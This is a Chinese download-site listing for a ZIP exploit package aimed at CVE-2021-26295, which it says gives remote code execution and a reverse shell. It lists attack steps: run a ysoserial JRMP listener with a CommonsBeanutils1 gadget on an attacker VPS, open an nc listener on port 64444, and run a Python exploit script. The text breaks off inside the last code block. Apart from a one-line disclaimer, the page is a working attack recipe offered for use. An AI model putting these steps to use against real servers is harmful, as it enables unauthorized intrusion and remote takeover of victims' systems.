
CVE-2021-26295: 成功利用CVE-2021-26295漏洞进行shell反弹攻击
5星
- 浏览量: 0
- 大小:None
- 文件类型:ZIP
简介:
本文探讨了CVE-2021-26295漏洞,详细描述了如何通过此安全弱点实现远程代码执行,并成功实施了一次Shell反弹攻击。
CVE-2021-26295 EXP可成功反弹shell
本段落以及工具仅限于技术共享,不能用于非法用途,否则一切后果自行承担。
触发命令执行EXP的方法如下:
1. 在VPS上启动RMI监听端口9999:
```
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 [要执行的命令]
```
2. 在VPS上启动nc监听端口64444:
```
nc -lvp 64444
```
3. 执行python脚本:
```
python3 cve-2021-26295_exp.py
全部评论 (0)
还没有任何评论哟~


